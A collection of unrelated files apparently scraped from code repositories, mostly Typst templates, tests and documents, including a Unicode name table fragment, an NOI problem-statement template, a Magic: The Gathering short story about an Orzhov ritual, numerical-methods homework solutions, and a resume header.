("GARAY CAPITAL LETTER JA", "Lu", 0),
("GARAY CAPITAL LETTER SA", "Lu", 0),
("GARAY CAPITAL LETTER WA", "Lu", 0),
("GARAY CAPITAL LETTER LA", "Lu", 0),
("GARAY CAPITAL LETTER GA", "Lu", 0),
("GARAY CAPITAL LETTER DA", "Lu", 0),
("GARAY CAPITAL LETTER XA", "Lu", 0),
("GARAY CAPITAL LETTER YA", "Lu", 0),
("GARAY CAPITAL LETTER TA", "Lu", 0),
("GARAY CAPITAL LETTER RA", "Lu", 0),
("GARAY CAPITAL LETTER NYA", "Lu", 0),
("GARAY CAPITAL LETTER FA", "Lu", 0),
("GARAY CAPITAL LETTER NA", "Lu", 0),
("GARAY CAPITAL LETTER PA", "Lu", 0),
("GARAY CAPITAL LETTER HA", "Lu", 0),
("GARAY CAPITAL LETTER OLD KA", "Lu", 0),
("GARAY CAPITAL LETTER OLD NA", "Lu", 0),
(),
(),
(),
("GARAY VOWEL SIGN E", "Mn", 230),
("GARAY CONSONANT GEMINATION MARK", "Mn", 230),
("GARAY COMBINING DOT ABOVE", "Mn", 230),
("GARAY COMBINING DOUBLE DOT ABOVE", "Mn", 230),
("GARAY CONSONANT NASALIZATION MARK", "Mn", 230),
("GARAY HYPHEN", "Pd", 0),
("GARAY REDUPLICATION MARK", "Lm", 0),
("GARAY SMALL LETTER A", "Ll", 0),
("GARAY SMALL LETTER CA", "Ll", 0),
("GARAY SMALL LETTER MA", "Ll", 0),
("GARAY SMALL LETTER KA", "Ll", 0),
("GARAY SMALL LETTER BA", "Ll", 0),
("GARAY SMALL LETTER JA", "Ll", 0),
("GARAY SMALL LETTER SA", "Ll", 0),
("GARAY SMALL LETTER WA", "Ll", 0),
("GARAY SMALL LETTER LA", "Ll", 0),
("GARAY SMALL LETTER GA", "Ll", 0),
("GARAY SMALL LETTER DA", "Ll", 0),
("GARAY SMALL LETTER XA", "Ll", 0),
("GARAY SMALL LETTER YA", "Ll", 0),
("GARAY SMALL LETTER TA", "Ll", 0),
("GARAY SMALL LETTER RA", "Ll", 0),
("GARAY SMALL LETTER NYA", "Ll", 0),
("GARAY SMALL LETTER FA", "Ll", 0),
("GARAY SMALL LETTER NA", "Ll", 0),
("GARAY SMALL LETTER PA", "Ll", 0),
("GARAY SMALL LETTER HA", "Ll", 0),
("GARAY SMALL LETTER OLD KA", "Ll", 0),
("GARAY SMALL LETTER OLD NA", "Ll", 0),
(),
(),
(),
(),
(),
(),
(),
(),
("GARAY PLUS SIGN", "Sm", 0),
("GARAY MINUS SIGN", "Sm", 0),
)
|
https://github.com/Myriad-Dreamin/typst.ts | https://raw.githubusercontent.com/Myriad-Dreamin/typst.ts/main/cli/README.md | markdown | Apache License 2.0 | # typst-ts-cli
See [Typst.ts](https://github.com/Myriad-Dreamin/typst.ts)
|
https://github.com/HPDell/typst-starter-journal-article | https://raw.githubusercontent.com/HPDell/typst-starter-journal-article/main/template/main.typ | typst | MIT License | #import "@preview/starter-journal-article:0.3.1": article, author-meta
#show: article.with(
title: "Article Title",
authors: (
"Author One": author-meta(
"UCL", "TSU",
email: "<EMAIL>",
),
"Author Two": author-meta(
"TSU",
cofirst: true
),
"Author Three": author-meta(
"TSU"
)
),
affiliations: (
"UCL": "UCL Centre for Advanced Spatial Analysis, First Floor, 90 Tottenham Court Road, London W1T 4TJ, United Kingdom",
"TSU": "Haidian District, Beijing, 100084, P. R. China"
),
abstract: [#lorem(100)],
keywords: ("Typst", "Template", "Journal Article"),
bib: bibliography("./ref.bib")
)
= Section
#lorem(20) @netwok2020
== Subsection
#lorem(50)
=== Subsubsection
#lorem(80)
|
https://github.com/donabe8898/typst-thesis-template | https://raw.githubusercontent.com/donabe8898/typst-thesis-template/main/template/main.typ | typst | Apache License 2.0 | #import "../resume/titlepage.typ": *
// ページ設定
#set par(leading: 1em)
#set enum(indent: 1em)
#set table(inset: 8pt)
#set heading(numbering: "1.1.")
#set ref(supplement: "式")
// 表紙
#show: titlepage.with(
title: "ハンバーガー4個分指数に関する研究",
author: "XDG1991L 小倉=ノルト=オグラノ",
date: "2023 年 12 月 hoge 日",
year:"2023 年度",
teacher: "指導教員 菜似四天 阿呆駄羅 教授",
univ_name: "フォーエバー大学 経済学部"
)
// ページ設定
#set math.equation(numbering: (sym.dots.h.c + " (1)"))
#set page(
numbering: "1",
)
#set figure(
numbering: "1",
)
#set align(left)
// NOTE: コードブロックの背景など
#show raw.where(block: false): box.with(
fill: luma(240),
inset: (x: 3pt, y: 0pt),
outset: (y: 3pt),
radius: 2pt,
)
#show raw.where(block: true): block.with(
fill: luma(240),
inset: 10pt,
radius: 4pt,
)
// 目次設定
#counter(page).update(1)
#outline(title: [目次])
// 改ページ
#pagebreak()
= これでいいのだ
#v(1em)
```textile
コードも楽々打てる。
> 楽にコードが書けるわけではないが?
```
```rs
fn main(){
println!("Hello World");
}
``` |
https://github.com/Wallbreaker5th/fuzzy-cnoi-statement | https://raw.githubusercontent.com/Wallbreaker5th/fuzzy-cnoi-statement/main/fuzzy-cnoi-statement.typ | typst | MIT No Attribution | // Typst template for making NOI-like problems
// Author: Wallbreaker5th
// MIT-0 License
#import "@preview/codelst:2.0.0": sourcecode
#let 字号 = (
初号: 42pt,
小初: 36pt,
一号: 26pt,
小一: 24pt,
二号: 22pt,
小二: 18pt,
三号: 16pt,
小三: 15pt,
四号: 14pt,
中四: 13pt,
小四: 12pt,
五号: 10.5pt,
小五: 9pt,
六号: 7.5pt,
小六: 6.5pt,
七号: 5.5pt,
小七: 5pt,
)
#let default-fonts = (
mono: "Consolas",
serif: "New Computer Modern",
cjk-serif: "FZShuSong-Z01S",
cjk-sans: "FZHei-B01S",
cjk-mono: "FZFangSong-Z02S",
cjk-italic: "FZKai-Z03S",
)
#let empty-par = {
par()[
#v(0em, weak: true)
#h(0em)
]
}
#let add-empty-par(it) = {
it
empty-par
}
#let default-problem-fullname(problem) = {
if (problem.at("name", default: none) != none) {
problem.name
if (problem.at("name-en", default: none) != none) {
"(" + problem.name-en + ")"
}
} else {
problem.at("name-en", default: "")
}
}
#let default-header(contest-info, current-problem) = {
if (current-problem == none) {
return
}
set text(size: 字号.五号)
contest-info.name
h(1fr)
let round = contest-info.at("round", default: none)
if (round != none) {
round + " "
}
default-problem-fullname(current-problem)
v(-2pt)
line(length: 100%, stroke: 0.3pt)
}
#let default-footer(contest-info, current-problem) = {
if (current-problem == none) {
return
}
set text(size: 字号.五号)
align(center,{
[第]
counter(page).display()
[页]
h(2em)
[共]
context{
let cnt = counter(page).final().at(0)
link((page:cnt, x:0pt, y:0pt), text(fill: rgb("#00f"), [#cnt]))
}
[页]
})
}
#let make-formula(s) = {
let numbers = s.matches(regex("[\d.]+"))
let last-end = 0
for n in numbers {
let start = n.start
let end = n.end
let number = n.text
s.slice(last-end, start)
math.equation(number)
last-end = end
}
s.slice(last-end, s.len())
}
#let current-problem-idx = counter("current-problem-idx")
#let statement-page-begin = state("statement-page-begin", false)
#let document-class(
contest-info,
problem-list,
custom-fonts: (:),
header: default-header,
footer: default-footer,
) = {
let fonts = default-fonts + custom-fonts
let get-current-problem(here) = {
let idx = current-problem-idx.at(here).at(0) - 1
if (idx >= 0) { problem-list.at(idx) }
}
let init(it) = {
set text(font: (fonts.serif, fonts.cjk-serif), size: 字号.小四, lang: "zh", region: "CN")
show emph: set text(font: (fonts.serif, fonts.cjk-italic))
show strong: st => { // Dotted strong text
set text(font: (fonts.serif, fonts.cjk-sans))
show regex("\p{sc=Hani}+"): s => {
underline(s, offset: 3pt, stroke: (
cap: "round",
thickness: 0.1em,
dash: (array: (0em, 1em), phase: 0.5em)
))
}
st
}
show raw: set text(font: (fonts.mono, fonts.cjk-mono), size: 字号.小四)
set list(indent: 1.75em, marker: ([•], [#h(-1em)•]))
set enum(
indent: 1.75em,
numbering: x => {
grid(
columns: (0em, auto),
align: bottom,
hide[悲], numbering("1.", x)
) // As a workaround
}
)
show heading: set text(font: (fonts.serif, fonts.cjk-sans), weight: 500)
show heading.where(level: 1): it => {
set text(size: 字号.小二)
set heading(bookmarked: true)
pad(top: 8pt, align(center, it))
}
show heading.where(level: 2): it => {
set text(size: 字号.小四)
set heading(bookmarked: true)
pad(left: 1.5em, top: 1em, bottom: .5em, [【]+box(it)+[】])
}
show raw.where(block: true): it => {
show raw.line: it => {
if (it.text == "" and it.number == it.count) {
return
}
box(
grid(
columns: (0em, 1fr),
align: (right, left),
move(
text(str(it.number), fill: gray, size: 0.8em),
dx: -1em,
dy: 0.1em,
),
it.body
)
)
}
pad(
rect(it, stroke: 0.5pt + rgb("#00f"), width: 100%, inset: (y: 0.7em)),
left: 0.5em
)
}
// Page Layout
set page(
margin: 2.4cm,
header: context header(contest-info, get-current-problem(here())),
footer: context if(statement-page-begin.at(here())) {
footer(contest-info, get-current-problem(here()))
},
)
show figure: add-empty-par
show table: pad.with(y: .5em)
show table: add-empty-par
show heading: add-empty-par
show list: add-empty-par
show enum: add-empty-par
show raw.where(block: true): add-empty-par
show rect: add-empty-par
show block: add-empty-par
set par(first-line-indent: 2em, leading: 0.7em)
// Looks right but I'm not sure about the exact value
show par: set block(below: 0.6em)
it
}
let title() = {
align(center, {
text(contest-info.name, size: 字号.二号, font: (fonts.serif, fonts.cjk-sans))
parbreak()
v(10pt)
let name-en = contest-info.at("name-en", default: none)
if (name-en != none) {
text(name-en, size: 字号.小一)
parbreak()
v(10pt)
}
let round = contest-info.at("round", default: none)
if (round != none) {
emph(text(round, size: 字号.二号))
parbreak()
}
let author = contest-info.at("author", default: none)
if (author != none) {
text(author, size: 字号.小三, font: (fonts.serif, fonts.cjk-sans))
parbreak()
v(5pt)
}
let time = contest-info.at("time", default: none)
if (time != none) {
text(time, size: 字号.小三, font: (fonts.serif, fonts.cjk-sans))
}
})
}
let problem-table(
extra-rows: (:),
languages: (("C++", "cpp"),),
compile-options: (("C++", "-O2 -std=c++14 -static"),),
) = {
let default-row = (
wrap: text,
always-display: false,
default: "无",
)
let rows = (
name: (
name: "题目名称",
always-display: true,
),
type: (
name: "题目类型",
always-display: true,
default: "传统型",
),
name-en: (
name: "目录",
wrap: raw,
always-display: true,
),
executable: (
name: "可执行文件名",
wrap: raw,
always-display: true,
default: x => x.name-en,
),
input: (
name: "输入文件名",
wrap: raw,
always-display: true,
default: x => x.name-en + ".in",
),
output: (
name: "输出文件名",
wrap: raw,
always-display: true,
default: x => x.name-en + ".out",
),
time-limit: (
name: "每个测试点时限",
wrap: make-formula,
),
memory-limit: (
name: "内存限制",
wrap: make-formula,
),
test-case-count: (
name: "测试点数目",
default: "10",
wrap: make-formula,
),
subtask-count: (
name: "子任务数目",
default: "1",
),
test-case-equal: (
name: "测试点是否等分",
default: "是",
),
) + extra-rows
rows = rows.pairs().map(
row => (row.at(0), default-row + row.at(1))
)
set table(align: bottom)
let first-column-width = if (problem-list.len() <= 3) { 22% } else { 1fr }
let columns = (first-column-width, ) + (1fr, ) * problem-list.len()
table(
columns: columns,
stroke: 0.4pt,
..{
rows.filter(row => {
let (field, r) = row
if (r.always-display) {
true
} else {
problem-list.any(p => p.at(field, default: none) != none)
}
}).map(row => {
let (field, r) = row
(text(r.name), )
problem-list.map(p => {
let v = p.at(field, default: none)
let w = if (v == none) {
if (type(r.default) == str) {
(r.wrap)(r.default)
} else if (type(r.default) == function) {
(r.wrap)((r.default)(p))
} else if (type(r.default) == content) {
(r.wrap)(r.default)
}
} else {
v
}
if (type(w) == str) {
(r.wrap)(w)
} else {
w
}
})
}).flatten()
}
)
[提交源程序文件名]
table(
columns: columns,
stroke: 0.4pt,
align: horizon,
..{
languages.map(l => {
if (l.len() == 2) {
l += (1em, )
}
(text(size: l.at(2))[对于 #l.at(0) #h(1fr) 语言], )
problem-list.map(p => {
let v = p.at("submit-file-name", default: p.name-en + "." + l.at(1))
if (type(v) == str) {
raw(v)
} else if (type(v) == function){
v(l.at(1))
} else {
v
}
})
}).flatten()
}
)
[编译选项]
table(
columns: columns,
align: (left+bottom, center+bottom),
stroke: 0.4pt,
..{
compile-options.map(l => {
if (l.len() == 2) {
l += (1em, )
}
(
text(size: l.at(2))[对于 #l.at(0) #h(1fr) 语言],
table.cell(
colspan: problem-list.len(),
raw(l.at(1))
)
)
}).flatten()
}
)
}
let next-problem() = {
current-problem-idx.step()
pagebreak()
statement-page-begin.update(it => true)
context {
let problem = get-current-problem(here())
heading(level: 1, default-problem-fullname(problem))
}
}
let filename(it) = {
set text(style: "italic", weight: "bold")
it
}
let current-filename(ext) = context {
let problem = get-current-problem(here())
filename(problem.at("name-en") + "." + ext)
}
let current-sample-filename(idx, ext) = context {
let problem = get-current-problem(here())
filename(problem.at("name-en") + "/" + problem.at("name-en") + str(idx) + "." + ext)
}
let data-constraints-table-args = {
(
stroke: (x, y) => (
left: if (x > 0) { .4pt },
bottom: 2pt,
top: if(y == 0) { 2pt } else if (y == 1) { 1.2pt } else { .4pt }
),
align: center+horizon,
)
}
(
init: init,
title: title,
problem-table: problem-table,
next-problem: next-problem,
filename: filename,
current-filename: current-filename,
current-sample-filename: current-sample-filename,
data-constraints-table-args: data-constraints-table-args
)
}
|
https://github.com/jgm/typst-hs | https://raw.githubusercontent.com/jgm/typst-hs/main/test/typ/compiler/array-06.typ | typst | Other | // Test default value.
#test((1, 2, 3).at(2, default: 5), 3)
#test((1, 2, 3).at(3, default: 5), 5)
|
https://github.com/zurgl/typst-resume | https://raw.githubusercontent.com/zurgl/typst-resume/main/templates/letter/main.typ | typst | #import "../../metadata.typ": *
#import "../commun.typ": *
#import "@preview/fontawesome:0.1.0": *
#let letterHeaderNameStyle(str) = { text(fill: accentColor, weight: "bold", str) }
#let letterHeaderAddressStyle(str) = { text(fill: gray, size: 0.9em, smallcaps(str)) }
#let letterDateStyle(str) = { text(size: 0.9em, style: "italic", str) }
#let letterSubjectStyle(str) = { text(fill: accentColor, weight: "bold", underline(str)) }
#let letterHeader(
myAddress: "Your Address Here",
recipientName: "<NAME>",
recipientAddress: "Company Address Here",
date: "Today's Date",
subject: "Subject: Hey!",
) = {
letterHeaderNameStyle(firstName + " " + lastName)
v(1pt)
letterHeaderAddressStyle(myAddress)
v(1pt)
align(right, letterHeaderNameStyle(recipientName))
v(1pt)
align(right, letterHeaderAddressStyle(recipientAddress))
v(1pt)
letterDateStyle(date)
v(1pt)
letterSubjectStyle(subject)
linebreak(); linebreak()
}
#let letterSignature(path) = {
linebreak()
place(right, dx: -5%, dy: 0%, image(path, width: 35%))
}
#let letterFooter() = {
place(bottom, table(
columns: (1fr, auto),
inset: 0pt,
stroke: none,
footerStyle([#firstName #lastName]),
footerStyle(languageSwitch(letterFooterInternational)),
))
}
|
|
https://github.com/TypstApp-team/typst | https://raw.githubusercontent.com/TypstApp-team/typst/master/tests/typ/meta/bibliography.typ | typst | Apache License 2.0 | // Test citations and bibliographies.
---
#set page(width: 200pt)
= Details
See also @arrgh #cite(<distress>, supplement: [p.~22]), @arrgh[p.~4], and @distress[p.~5].
#bibliography("/files/works.bib")
---
// Test unconventional order.
#set page(width: 200pt)
#bibliography(
"/files/works.bib",
title: [Works to be cited],
style: "chicago-author-date",
)
#line(length: 100%)
As described by #cite(<netwok>, form: "prose"),
the net-work is a creature of its own.
This is close to piratery! @arrgh
And quark! @quark
---
#set page(width: 200pt)
#set heading(numbering: "1.")
#show bibliography: set heading(numbering: "1.")
= Multiple Bibs
Now we have multiple bibliographies containing @glacier-melt @keshav2007read
#bibliography(("/files/works.bib", "/files/works_too.bib"))
---
// Test ambiguous reference.
= Introduction <arrgh>
// Error: 1-7 label occurs in the document and its bibliography
@arrgh
#bibliography("/files/works.bib")
---
// Error: 15-55 duplicate bibliography keys: netwok, issue201, arrgh, quark, distress, glacier-melt, tolkien54, sharing, restful, mcintosh_anxiety, psychology25
#bibliography(("/files/works.bib", "/files/works.bib"))
|
https://github.com/polarkac/MTG-Stories | https://raw.githubusercontent.com/polarkac/MTG-Stories/master/stories/003%20-%20Gatecrash/013_Behind%20the%20Black%20Sun.typ | typst | #import "@local/mtgstory:0.2.0": conf
#show: doc => conf(
"Behind the Black Sun",
set_name: "Gatecrash",
story_date: datetime(day: 27, month: 03, year: 2013),
author: "<NAME>",
doc
)
The candle flickered.
"I am a gateway for life," the cleric said.The dancing light added some numinous gravity to the statement.
The cleric smiled at the unconscious reaction that must have flickered across my face.
"Most give me a strange look when I tell them that. Perhaps it is because I wear the garb of an Orzhov and they believe in the grotesque slander perpetuated about our guild. We are not all selfish and greedy." The cleric sighed. "The ignorant always assume the worst, I suppose. People are easily swayed by mindless passion and intentioned guile, wouldn't you agree?"
"I suppose so," I said. "But you have to admit, the Orzhov are not known for playing fair."
The cleric leaned back in his chair, turned his palms up and shrugged. "We put everything in writing. It is all there to see. People just don't read the fine print before they sign."
I could feel the cleric's defensiveness and kicked myself for letting my own personal bias slip out. It was hard enough to find evidence of this order, let alone to actually be granted an audience with one of its members. I could feel years of work beginning to crumble in my hands. I'd have to swallow my opinions and pride if I was going to get anywhere with this unprecedented access.
"Very true. People are focused on what they want and rarely have the patience to wait and evaluate before acting on their desires."
That seemed to bring the cleric back again.
"Few can see the truth in that and I'm glad you do. My choice about revealing our order depends on your seeing with an open mind." He poured wine into a golden goblet and offered me some, but I politely declined. "The Orzhov value patience greatly. Its virtues are taught to us as soon as we begin our service to the guild; the task for which we have been chosen requires not only patience, but dedication, trust, and selflessness as well. Our task, our calling, is to lay down our lives for the Syndicate. We hold something beyond mere monetary value to the guild. We are a gateway through which something greater than ourselves can emerge."
Now we were getting to it. I was always fascinated by how devout belief could supersede the inherent desire to preserve life—our instinctual selfishness. The Boros wojek who sacrifices himself so innocents may live always held a mystery to me, a glimpse into another set of standards that runs deep within, operating below our critical, self-absorbed minds. It felt appropriate for Boros and Selesnya to exhibit such behavior, but the Orzhov? The rumors struck me as odd for the guild of deals.
Now, I would find out about this mystery cult within the walls of the Syndicate and document a critical moment of time in this cloistered world shrouded in myth and speculation.
The cleric set down his goblet and stood up.
"Walk with me to the sanctum."
#v(0.35em)
#line(length: 100%, stroke: rgb(90%, 90%, 90%))
#v(0.35em)
We walked into a high-ceilinged chamber that smelled of woody incense and torchwood. The cleric's robe flowed about him and the heavy gold disks that hung from his collar like thick smoke.
In the flickering torchlight, I could make out a large Orzhov symbol on the floor done with large, stone tiles. The cleric kneeled in the circle and motioned for me to sit on a small, armless chair some distance from him. As soon as I had pulled out my quill and paper, he began, his voice echoing off into the darkness.
"Our order represents the purest ideals of the Orzhov, which is why so few of us are chosen. It is too heavy a mantle for most, but I found that after being chosen my life was suffused with a great sense of purpose. To this day, fulfilling that purpose has been my highest ambition."
At that moment, two robed priests walked into the torchlight like silent phantoms. One set candles before the cleric and lit them with long matchsticks. The other priest set several bowls before the cleric that contained something heavy. I could tell because of the dull thud it made on the stone tiles. Then the priests left as silently as they came.
#figure(image("013_Behind the Black Sun/01.jpg", width: 100%), caption: [], supplement: none, numbering: none)
From the folds of his robe, the cleric produced a glass tube capped at either end that hung on a gold chain. Within the tube swirled a turbulent, white smoke that seemed somehow alive.
"This is the Deathpact," he said, as he gazed into the tube, its faint light playing across his features like sunlight through water. The cleric gazed into its depths, mesmerized. Its eerie luminescence made his already pale face impossibly paler, which served to exaggerate the blackness of his obsidian eyes; he looked like some ivory specter as he pondered its swirling depths. "It is the namesake of our sacred order. Hard to imagine that within this small cylinder lies such magnificent power."
The cleric unhooked the slender cylinder from its chain and reverently laid the tube before him. He then removed the lids from the golden bowls and reached in to scatter handfuls of coins around him on the floor. The sound of the coins as they echoed throughout the giant hall made me feel as if I was in some strange, enormous wind-chime. I felt a bolt of primal apprehension shoot through me and flood my limbs.
#emph[What kind of power was he talking about? Was I in danger?]
I instinctively moved back from the cleric and resisted the urge to flee from the room. I took a deep breath as he continued, recording everything with my quill pen in spite of my fear. The instincts of being a scribe are hard to quell: knowledge at any price.
I wondered what meaning, if any, the coins had, but I dared not break the ritual with a question. It felt rude. Sacrilegious. I scribbled down every detail I could as the cleric made more gestures and utterances. His trance slowly deepened; the scratching sound of my quill on parchment felt like an intrusion, but I was more afraid to leave out any detail.
Then he became still.
After a long moment with only the sounds of the torches burning, the cleric whispered.
"I am ready."
Then he unscrewed the cap of the glass cylinder.
My mind raced with anticipation. #emph[Ready for what? What was going to happen? What secrets were I about to witness.]
It seemed a trick of the mind at first, but then...
The turbulent smoke within the glass cylinder tentatively snaked out like a sentient thing. The cleric took in long deep breaths as the white smoke quested toward his face. It bumped into the cleric's chest; he reflexively jerked but held his eyes shut as it encircled his neck. As the smoke drew closer to his face, sliding upward toward the cleric's nose, I could make out a jet-black strand within it that looked like a slick piece of rubber glistening in the torchlight. The cleric's mumbled prayer ceased as he took one deep breath through his nose. As if it heard the inhalation, the smoke lunged into the cleric's nostrils and vanished. The cleric made a gagging sound as he crumpled forward.
I jumped up, but as I did my sleeve caught my ink-pot and sent it clattering across the stone floor. Black ink sprayed about like dark blood in the torchlight. I rushed to the cleric's side as he writhed on the floor and rolled him over. He clawed at his golden collar. His face had turned to a mottled patchwork of purplish veins and bruised flesh. I called for help. All I heard was the reverberations through the great hall.
Then black smoke began to billow out of the cleric's mouth. It reminded me instantly of an Izzet chemical fire I had witnessed a few years back.
The cleric's head and neck arched back as he went instantly stiff. The black smoke poured from his nose and ears as well and began to form before me as I recoiled and brought my sleeve to my face.
The cleric's body shriveled and desiccated before my eyes as a thick white vapor fumed out of it and coalesced into a humanoid shape. Arms, legs, head, and torso gathered before me into a solid form of a regal woman with skin like alabaster. The black smoke formed into two great wings behind her and billowing smoke wrapped around her like living cloth. Gold coins and their golden containers became puddles of liquid metal that formed into shimmering armor and the massive arc of a scythe. All this moved before my unbelieving eyes in an arcane act of creation, but all I could do was gaze on the face of this unearthly creature who regarded me with an impassive but intensely curious gaze.
She held out her hand, her pale fingers closing around the ebony haft of the great scythe precisely as the last wisps of black smoke formed the handle.
#figure(image("013_Behind the Black Sun/02.jpg", width: 100%), caption: [], supplement: none, numbering: none)
The angel flexed the fingers of her free hand as if to test their efficacy, then looked at her shining armor and surroundings. I was frozen. I didn't want to move, lest I incurred her wrath, but neither did I want to stay.
She flexed her raven-feathered wings then turned about to face me.
"You. Orzhov scribe. Write this." Even though it was just above a whisper, her voice sliced through the air like a razorblade. After a moment of hesitation, I scrambled for my parchment, quill, and toppled ink-pot. Thankfully, a few drops remained in the well.
"I have come from the ghost halls of the Obzedat with a message for <NAME>. There is more to the maze than we knew. T<NAME> must find the correct route and complete the maze at all costs."
|
|
https://github.com/LucaCiucci/bob-typ | https://raw.githubusercontent.com/LucaCiucci/bob-typ/main/README.md | markdown | MIT License | # bob-draw-typ
svgbob for typst, powered by wasm
See [`typst-package/README.md`](typst-package/README.md) for more information.
## Build
```sh
cargo build --release --target wasm32-unknown-unknown; cp ./target/wasm32-unknown-unknown/release/bob_typ.wasm ./typst-package
``` |
https://github.com/Thumuss/truthfy | https://raw.githubusercontent.com/Thumuss/truthfy/main/example.typ | typst | MIT License | #import "main.typ": *
#set page(width: auto, height: 500pt)
#truth-table($u_7 => u_(22) => u$, $u_7 ? u_22 : u$)
#truth-table($A xor B$, $A and B$)
#truth-table($A and B$, $B or A$, $A => B$)
#truth-table($p => q$, $not p => (q <=> p)$, $p or q$, $not p xor q$)
#truth-table(sc: (a) => {if (a) {"a"} else {"b"}}, $a and b$)
#truth-table-empty(sc: (a) => {if (a) {"x"} else {"$"}}, ($a and b$,), (false, [], true))
|
https://github.com/7sDream/fonts-and-layout-zhCN | https://raw.githubusercontent.com/7sDream/fonts-and-layout-zhCN/master/chapters/06-features-2/anchor/anchor.typ | typst | Other | #import "/template/template.typ": web-page-template
#import "/template/components.typ": note
#import "/lib/glossary.typ": tr
#show: web-page-template
// ## Anchor attachment
== #tr[anchor attachment]
// XXX
// 原文少一段介绍待补
|
https://github.com/EunTilofy/NumComputationalMethods | https://raw.githubusercontent.com/EunTilofy/NumComputationalMethods/main/Chapter10/Chapter10-1.typ | typst | #import "../template.typ": *
#show: project.with(
course: "Computing Method",
title: "Computing Method - Chapter10-1",
date: "2024.5.21",
authors: "<NAME>, 3210106357",
has_cover: false
)
*Problems:Chapter9-3,Chapter10-3*
#HWProb(name: "9-3")[
试证明 Jacobi 方法计算公式 (9.33) 可写成,
$
&d = cot 2 phi, t = d + text("sign")(d) sqrt(1 + d^2) \
&c = 1 \/ sqrt(1 + t^2), s = c t,\
&a_(i i)^((1)) = a_(i i) + t a_(i j), a_(j j)^((1)) = a_(j j) - t a_(i j),\
&a_(i j)^((1)) = a_(j i)^((1)) = 0, \
&a_(i l)^((1)) = a_(l i)^((1)) = c a_(i l) + s a_(j l), \
&a_(j l)^((1)) = a_(l j)^((1)) = -s a_(i l) + c a_(j l), l eq.not i, j\
&a_(m l)^((1)) = a_(l m)^((1)) = a_(m l), m,l eq.not i, j
$
]
#Proof[
对于 (9.33),若取 $
cot 2 phi = (a_(i i) - a_(j j)) / (2a_(i j)), abs(phi) leq pi / 4,
$
则$a_(i j)^((1)) = a_(j i)^((1)) = 1/2 (a_(j j) - a_(i i)) sin phi + (a_(i i) - a_(j j)) / (2 cot 2 phi) (cos^2 phi - sin^2 phi) = 1/2 (a_(j j) - a_(i i)) sin phi + 1/2 (a_(i i) - a_(j j)) (cos 2 phi) / (cot 2 phi) = 0,
$
根据 $d = cot 2 phi$,则 $1/d = (2 tan phi) / (1 - tan^2 phi) arrow.double tan phi = d + text("sign")(d) sqrt(1 + d^2)$,所以 $t = tan phi$。
$
a_(i i)^((1)) &= a_(i i) cos^2 phi + a_(j j) sin^2 phi + 2 a_(i j) cos phi sin phi \
&= a_(i i) - (a_(i i) - a_(j j)) sin^2 phi + a_(i j) sin 2 phi \
&= a_(i i) - 2 cot 2 phi a_(i j) sin^2 phi + a_(i j) sin 2 phi \
&= a_(i i) + a_(i j) (sin 2 phi - 2 cot 2 phi (1 - cos 2 phi)/2 ) \
&= a_(i i) + a_(i j) (sin^2 2 phi - cos 2 phi + cos^2 2 phi ) / (sin 2 phi) \
&= a_(i i) + a_(i j) (2sin^2 phi)/(2 sin phi cos phi)
= a_(i i) + t a_(i j)\
a_(j j)^((1)) &= a_(i i) sin^2 phi + a_(j j) cos^2 phi - 2 a_(i j) cos phi sin phi \
&= a_(j j) + (a_(i i) - a_(j j)) sin^2 phi + a_(i j) sin 2 phi
= a_(j j) - t a_(i j)
$
$c = 1\/ sqrt(1 + t^2) = cos phi, s = c t = sin phi$,所以,$
&a_(i l)^((1)) = a_(l i)^((1)) = c a_(i l) + s a_(j l), \
&a_(j l)^((1)) = a_(l j)^((1)) = -s a_(i l) + c a_(j l), l eq.not i, j\
$
]
#HWProb(name: "10-3")[
方程 $x^3 - x^2 - 1 = 0$ 在 $x_0 = 1.5$ 附近有根,把方程写成三种不同等价形式,
#set enum(numbering : "(1)")
+ $x = 1 + 1/x^2$,对应迭代格式: $x_(n+1) = 1 + 1/x_n^2$;
+ $x^3 = 1 + x^2$,对应迭代格式: $x_(n+1) = (1 + x_n^2)^(1/3)$;
+ $x^2 = 1/(x - 1)$,对应迭代格式: $x_(n+1) = sqrt(1/(x_n - 1))$。
判断迭代格式在 $x_0 = 1.5$ 的收敛性,并估计收敛速度,选一种收敛格式计算出 1.5 附近的根到 4 位有效数字,从 $x_0 = 1.5$ 出发,计算时保留 5 位有效数字。
]
#solution[
#set enum(numbering: "(1)")
+ 收敛,$phi_1(x) = 1 + 1/x^2, phi_1'(x) = - 2/x^3$,因为 $1.3^3 = 2.197 >2$,所以 $x in [1.3, 1.7]$ 上,$abs(phi_1'(x)) leq (2/1.3^3) < 1$,所以该区间上为收缩映射,因此迭代法收敛。
+ 收敛,$phi_2(x) = (1+x^2)^(1/3), phi_2'(x) = 2/3 x (1+x^2)^(-2/3)$,如下图所示,#figure(image("2.png", width: 50%)),因此在 $[1,2]$ 上 $abs(phi_2'(x)) < 0.46 < 1$,为压缩映射,因此迭代法收敛。
+ 不收敛,$phi_3(x) = sqrt(1 / (x - 1)),phi_3'(x) = -1/2 (x-1)^(-3/2)$,如下图所示,#figure(
image("3.png", width: 50%),
)在 $[1.4, 1.6]$ 区间上,$|phi(x)'| > 1$,因此不收敛。
因为 $abs(phi_2'(1.5)) = 0.46 < abs(phi_1'(1.5)) = 0.59$,所以迭代格式 (2) 的收敛速度更快。使用第二种迭代格式,计算结果如下:
$
x_0 = 1.5, x_1 = 1.4812, x_2 = 1.4727, x_3 = 1.4688, x_4 = 1.4670, x_5 = 1.4662\
x_6 = 1.4659, x_7 = 1.4657, x_8 = 1.4656, x_9 = 1.4656
$数值解为 $x^* = 1.466$(保留四位有效数字)。
] |
|
https://github.com/pm3512/resume | https://raw.githubusercontent.com/pm3512/resume/main/Alexander_Obolenskiy_resume.typ | typst | #let useAddress = false
#show heading: set text(font: "Linux Biolinum")
#show link: underline
#set text(size: 11.7pt)
#set page(
margin: (x: 0.9cm, y: 1.3cm),
)
// text with an icon and link (used in header)
#let iconText(icon, text, dest, dy, imageSize) = {
box(move(dy: dy, image(
width: imageSize,
icon,
)))
h(0.3em)
if dest != "" [#link(dest)[#text]] else [#text]
h(1em)
}
#set par(justify: true)
#let chiline() = {v(-3pt); line(length: 100%); v(-5pt)}
#let dashedline() = {v(-3pt); line(length: 100%, stroke: (dash: "dashed", thickness: 0.1mm)); v(-5pt)}
// header
#align(center)[
= <NAME>
#iconText("icons/email.png", "<EMAIL>", "mailto:<EMAIL>", 0.2em, 1em)
#iconText("icons/linkedin.png", "linkedin.com/in/alexander-obolenskiy", "https://www.linkedin.com/in/alexander-obolenskiy/", 0.15em, 1em)
#iconText("icons/phone.png", "878-999-6928", "", 0.2em, 1em)
